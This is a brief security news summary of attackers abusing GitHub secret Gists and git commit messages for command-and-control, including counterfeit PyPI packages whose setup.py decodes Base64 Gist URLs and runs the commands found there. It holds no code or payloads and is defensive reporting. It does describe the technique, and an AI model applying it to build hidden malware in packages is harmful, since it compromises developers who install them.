Hackers are increasingly utilizing GitHub for malicious purposes [1] [2] [3], exploiting secret Gists and issuing malicious commands through git commit messages [1] [2] [3]. This enables them to evade detection and control compromised hosts [2] [3]. While public services like Dropbox [2] [3], Google Drive [2] [3], and Discord have been used to host second stage malware, the use of GitHub as a malware hosting platform is on the rise [2] [3]. By utilizing public sources for command-and-control (C2) [2] [3], hackers can easily create affordable and reliable attack infrastructure. This technique allows them to blend their malicious network traffic with legitimate communications [2] [3], making it challenging to effectively detect and respond to threats.
Description
The abuse of GitHub Gists is a new trend [2] [3], as they provide a convenient way for developers to share code snippets [2] [3]. Although secret Gists are not accessible via GitHub’s Discover feed, they can be shared with others by sharing the URL [3]. This allows threat actors to leverage secret Gists as a pastebin service [2] [3]. Researchers have identified several PyPI packages that masquerade as network proxying libraries but actually contain Base64-encoded URLs pointing to secret Gists hosted on throwaway GitHub accounts [2] [3]. These Gists contain Base64-encoded commands that are executed through malicious code in the setup.py file of the counterfeit packages [2] [3]. Another observed technique is the exploitation of version control system features [2], where git commit messages are used to extract commands for execution on the system [2]. The fraudulent packages have been removed from the Python Package Index repository [2] [3].
Conclusion
While the use of GitHub as command-and-control infrastructure is not new [2], the abuse of features like Git Gists and commit messages for command delivery is a novel approach employed by malicious actors [2] [3]. These innovative methods highlight the need for stronger security measures [1]. It is crucial to develop robust detection and response mechanisms to mitigate the risks associated with hackers utilizing GitHub for malicious purposes. Additionally, ongoing vigilance and proactive measures are necessary to stay ahead of evolving threats in the cybersecurity landscape.
References
[1] https://thehackernews.com/2023/12/hackers-abusing-github-to-evade.html
[2] https://www.ihash.eu/2023/12/hackers-abusing-github-to-evade-detection-and-control-compromised-hosts/
[3] https://owasp.or.id/2023/12/19/hackers-abusing-github-to-evade-detection-and-control-compromised-hosts/
